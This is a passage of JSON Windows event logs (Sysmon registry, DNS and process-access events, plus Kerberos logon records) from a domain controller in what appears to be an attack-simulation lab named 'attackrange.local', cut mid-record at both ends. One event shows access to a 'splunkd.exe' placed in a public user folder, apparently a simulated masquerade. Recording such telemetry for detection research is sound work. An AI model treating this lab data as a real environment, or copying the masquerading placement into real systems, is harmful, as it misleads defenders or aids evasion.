(0x00000001)","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":2564,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: \r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:49:39.410\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nProcessId: 1196\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\Category\r\nDetails: DWORD (0x00000002)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.410","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001015C40000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\Category","Details":"DWORD (0x00000002)","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":2565,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: \r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:49:39.410\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nProcessId: 1196\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\DateCreated\r\nDetails: Binary Data","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.410","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001015C40000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\DateCreated","Details":"Binary Data","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":2566,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: \r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:49:39.410\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nProcessId: 1196\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\NameType\r\nDetails: DWORD (0x00000006)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.410","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001015C40000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\NameType","Details":"DWORD (0x00000006)","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220317,"ProcessID":864,"ThreadID":3032,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x48460\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x48460","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":2567,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: \r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:49:39.410\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nProcessId: 1196\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\DateLastConnected\r\nDetails: Binary Data","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.410","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001015C40000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\DateLastConnected","Details":"Binary Data","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220318,"ProcessID":864,"ThreadID":3032,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x48460\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t49710\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x48460","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"49710","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220319,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x48460\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x48460","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2568,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.989\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.989","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":4611686018695823360,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1014,"SourceName":"Microsoft-Windows-DNS-Client","ProviderGuid":"{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}","Version":0,"Task":1014,"OpcodeValue":0,"RecordNumber":76839,"ProcessID":1336,"ThreadID":1684,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Name resolution for the name 2.0.0.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa. timed out after none of the configured DNS servers responded.","Opcode":"Info","QueryName":"2.0.0.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa.","AddressLength":"128","Address":"1700000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2569,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.227\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.227","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2570,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.231\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _gc._tcp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.231","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_gc._tcp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2571,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.235\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _gc._tcp.Default-First-Site-Name._sites.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.235","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_gc._tcp.Default-First-Site-Name._sites.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2572,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.239\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _kerberos._udp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.239","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_kerberos._udp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2573,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.242\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _kpasswd._tcp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.242","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_kpasswd._tcp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2574,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.246\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _kpasswd._udp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.246","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_kpasswd._udp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2575,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.249\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: DomainDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.249","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"DomainDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2576,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.253\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.DomainDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 